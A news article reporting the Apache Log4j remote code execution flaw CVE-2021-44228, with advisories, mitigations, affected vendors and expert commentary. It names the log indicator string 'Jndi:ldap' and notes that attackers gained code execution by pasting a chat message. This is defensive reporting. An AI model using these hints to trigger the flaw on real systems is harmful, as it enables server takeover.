3rd Party Risk Management , Application Security , Breach Notification
Severe Apache Log4j Vulnerability Threatens Enterprise Apps
Unauthenticated RCE Vulnerability Could Affect 'Thousands of Organizations'Stay tuned for updates on this developing story.
See Also: Delivering Globally Consistent App Performance to the Hybrid Workforce
A zero-day vulnerability detected in the Java logging library Apache Log4j can result in full server takeover and leaves countless applications vulnerable, according to security researchers, who say that the easily exploitable flaw was first detected in the popular game Minecraft.
The unauthenticated remote code execution vulnerability - classified as severe and tracked as CVE-2021-44228 - is actively being exploited in the wild and proof-of-concept code has been published, according to an advisory from CERT New Zealand.
Systems and services using the Java logging library Apache Log4j between version 2.0 and 2.14.1, which "includes many applications and services written in Java," are vulnerable, CERT NZ says.
The same researchers say the log files for any services using affected Log4j versions will contain user-controlled strings, including "Jndi:ldap." For immediate mitigation, researchers say, users should switch log4j2.fortmatMsgNoLookups to "true" by adding: "-Dlog4j2.formatMsgNoLookups=True" to the JVM command for starting the application.
For prevention, they urgently advise users to upgrade Log4j versions to Log4j-2.15.0-rc2.
In an alert issued on Friday, the U.S. Cybersecurity and Infrastructure Security Agency said it "encourages users and administrators to review the Apache Log4j 2.15.0 announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately."
Minecraft & Many More
The vulnerability was first detected in the game Minecraft, but cloud applications, including those widely used across the enterprise, also remain vulnerable. This includes software, web apps and products from Apple, Amazon, Cloudflare, Twitter and Steam.
"This is a worst-case scenario," says Casey Ellis, founder at CTO of the security firm Bugcrowd. "It's going to be a long weekend for a lot of people."
"This has the potential to be really bad - like Shellshock bad. Like, remote code execution in all WordPress servers bad," says Adrian Sanabria, co-founder and director of research at Savage Security. "It might take the bad guys a few days to figure out how best to leverage this, but I highly doubt everyone is going to get this fixed before it starts getting exploited."
The vulnerability was first reported to Apache by Alibaba Cloud's security team on Nov. 24, according to Cyber Kendra.
Experts at the security firm Randori say the vulnerability is likely to affect "thousands of organizations" and "poses a significant real-world risk to affected systems,"including attention from cybercriminals and nation-state actors.
Rob Joyce, a former White House homeland security adviser and current director of cybersecurity at the National Security Agency, took to Twitter regarding Log4j, saying: "[This] vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA [an open-source reverse-engineering tool]. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure."
LunaSec CEO Free Wortley and developer Chris Thompson say in a blog post that similar vulnerabilities have been exploited before - in cases such as the 2017 Equifax data breach, which exposed sensitive information of some 143 million U.S. consumers.
Adopt an 'Assume Breach' Mentality
The Randori experts say that they developed a working exploit and were able to successfully leverage the vulnerability in customer environments. "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation," the Randori Attack Team says.
The team says it expects an increasing number of vulnerable products to be discovered in the upcoming weeks. "Due to the ease of exploitation and the breadth of applicability," it says, "we expect ransomware actors to begin leveraging this vulnerability immediately." The team advises all organizations to adopt an "assume breach" mentality and check logs for any affected applications for unusual activity.
'Bundled in With Software You Use'
Other experts also stress the significance of this severe vulnerability.
Security researcher Marcus Hutchins of the firm Kryptos Logic tweeted: "In the case of Minecraft, attackers were able to get remote code execution on Minecraft Servers by simply pasting a short message into the chat box."
And John Hammond, senior security researcher at the firm Huntress, says in a blog: "The log4j package may be bundled in with software you use provided by any given vendor. In this scenario, unfortunately, the vendors themselves will need to push the security updates downstream."
"There’s no obvious target for this vulnerability," he says. "Hackers are taking a spray-and-pray approach to wreak havoc. … Depending on access controls and other elements of your security posture, this could lead to future compromise - whether it be cryptocurrency miners, Cobalt Strike beacons, or ransomware."
This dire warning also serves as an example of how critical detection and response capabilities are and exposes the riskiness of "prevent, patch and pray" strategies embedded in legacy security programs, says Tim Wade, a former network and security technical manager with the U.S. Air Force who is currently technical director with the firm Vectra AI.
And Hammond says, "As you assess your own risk and threat model, please consider the components of the software you use and especially what may be publicly accessible."
+++
Update [5:10 p.m., Dec. 10]: A spokesperson for Cloudflare tells ISMG: "We have no evidence of exploitation of us. We responded quickly to evaluate all potential areas of risk and updated our software to prevent attacks, and have not been able to replicate any external claims that we might be at risk."
Update [5:15 p.m., Dec. 10]: The story has been updated to include CISA's Log4j advisory.